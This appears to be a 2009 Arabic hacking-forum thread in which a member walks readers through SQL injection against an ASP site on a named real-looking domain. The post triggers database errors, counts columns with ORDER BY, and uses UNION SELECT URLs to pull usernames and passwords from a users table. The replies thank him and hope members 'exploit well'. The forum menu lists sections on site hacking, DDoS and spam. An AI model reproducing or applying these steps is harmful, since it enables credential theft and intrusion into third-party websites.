تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



قسم المواضيع المميزة نضع المواضيع المميزة والجديدة

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية mr.le0n
mr.le0n
العبد الفقير الى الله

mr.le0n غير متواجد حالياً
 
رقم العضوية : 9
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 4,426
عدد النقاط : 10
قوة التقييم :
Post لاول مرة .. شرح استغلال ثغرات Asp باحتراف ..

كُتب : [ 11-28-2009 - 07:14 PM ]


السلام عليكم ورحمة الله وبركاته

اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن استغلال ثغرات asp ..
هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

انا ساشرج لكم على موقع www.haybersqlogretiyo.com

المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '
www.haybersqlogretiyo.com/baskabibolum.asp?id=10"


يظهر لنا الخطأ التالى :

كود PHP:
Microsoft JET Database Engine error ’80040e14’ 
Syntax error in string in query expression ’id 
10";’. 
/baskabirbolum.asp, line 7 
الان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
http://www.haybersqlogretiyo.com/bas...=10+order+by+1

الان عند الوصول الى العمود المصاب وهو 10
http://www.haybersqlogretiyo.com/bas...10+order+by+10
يظهر الخطأ التالى :

كود PHP:
Microsoft JET Database Engine error ’80040e14’ 
The Microsoft Jet database engine does not recognize ’10’ 
as a valid field name or expression
/
news.aspline 7 
ويكون العمود المصاب الرقم 8
http://www.haybersqlogretiyo.com/bas...=10+order+by+8



http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7--

الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة
كود PHP:
Microsoft JET Database Engine error ’80040e37’ 
The Microsoft Jet database engine cannot find the input table 
or query ’hayber’Make sure it exists and that its name is spelled correctly
/
baskabirbolum.aspline 7 
واسمها : hayber

ويتم استغلالها .
http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7+from+hayber

والان نظهر اسم اليوزر والباس
http://www.haybersqlogretiyo.com/bas...0,username,pas sword,3,4,5,6,7+from+users

توقيع : mr.le0n

ربى عوضنى بما هو خير مما خسرت .. واكتب لى السعادة حتى ترضى عنى ... وابدلنى بما هو خير لنفسى ... واجعل صلتى بك افضل من صلتى بغيرك

رد مع إقتباس
2 أعضاء آرسلو آعجاب لـ mr.le0n على المشاركة المفيدة:
Dev.hacker (03-21-2014), yessin (03-25-2014)
بياناتي
 رقم المشاركة : ( 2 )
zero code

رقم العضوية : 10
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 99
عدد النقاط : 10

zero code غير متواجد حالياً

افتراضي مية مية

كُتب : [ 11-28-2009 - 07:37 PM ]


ماشاء الله روعة حبيبي لكن مادامك تكلمت عنها فياليتك تفصح عن الاسرار فيها والكثير من خبايا الاختراق بهذه الطرق تقبل مروري


توقيع : zero code


رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
ClaW

 

# .: Admin :. #

 

رقم العضوية : 6
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 849
عدد النقاط : 10

ClaW غير متواجد حالياً

افتراضي

كُتب : [ 11-28-2009 - 08:13 PM ]


يديك العافيا اخ ليون

تقبل مرورى


توقيع : ClaW

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
Mr.RoO7

رقم العضوية : 1617
تاريخ التسجيل : Sep 2009
مكان الإقامة :
عدد المشاركات : 712
عدد النقاط : 10

Mr.RoO7 غير متواجد حالياً

I أبو هآدى I

افتراضي

كُتب : [ 11-29-2009 - 07:30 AM ]


شكرا لك اخى على الشرح بس رابط الموقع خربان

تحايتى


توقيع : Mr.RoO7

.llAll. Mr.RoO7 .llAll.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
matrix_reloadz

رقم العضوية : 3794
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 39
عدد النقاط : 10

matrix_reloadz غير متواجد حالياً

افتراضي

كُتب : [ 11-30-2009 - 01:04 PM ]


شرح ممتاز
يارب يفيد الاخوه ويحسنو الاستغلال

تقبل تحياتي اخي الفاضل


توقيع : matrix_reloadz

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
ثوره قآئد

رقم العضوية : 3066
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 6
عدد النقاط : 10

ثوره قآئد غير متواجد حالياً

افتراضي

كُتب : [ 11-30-2009 - 08:48 PM ]


بآرك الله فيك يا طيب


توقيع : ثوره قآئد

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
craze hacker

رقم العضوية : 2900
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 54
عدد النقاط : 10

craze hacker غير متواجد حالياً

افتراضي

كُتب : [ 12-24-2009 - 12:39 PM ]


يسلمووووو

بارك الله فيك


توقيع : craze hacker

.:: فريق قراصنة غزة ::.

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
لاول, مرة, asp, استغلال, باحتراف, ثغرات, شرح


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


جميع الأوقات بتوقيت GMT +2. الساعة الآن 01:35 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @